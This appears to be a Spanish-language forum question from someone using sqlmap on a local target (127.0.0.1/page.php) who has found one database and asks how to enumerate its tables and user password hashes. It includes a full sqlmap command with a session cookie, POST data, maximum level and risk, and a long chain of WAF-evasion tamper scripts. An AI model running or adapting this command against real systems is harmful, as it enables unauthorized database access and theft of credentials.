He usado SQLMAP para verificar la inyección de SQL. He logrado recuperar el nombre de una sola base de datos ( dbInfo )
Sin embargo, al usar SQLMAP no puedo enumerar nada más, donde se encuentran las tablas dentro de la base de datos o los hashes de usuario ... que es lo que quiero obtener.
¿Algún consejo? Aquí está lo que he usado. Encontré un archivo sqldump.sql en la raíz con el nombre de dos tablas llamadas products y secrets si eso ayuda?
root@kali:~# sqlmap -t --cookie="PHPSESSID=XXX"
-u https://127.0.0.1/page.php
--data="timestamp=1461171839"
--method=POST
--threads=10
--no-cast
-D=dbInfo
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
--level=5
--risk=3
--dbms=mysql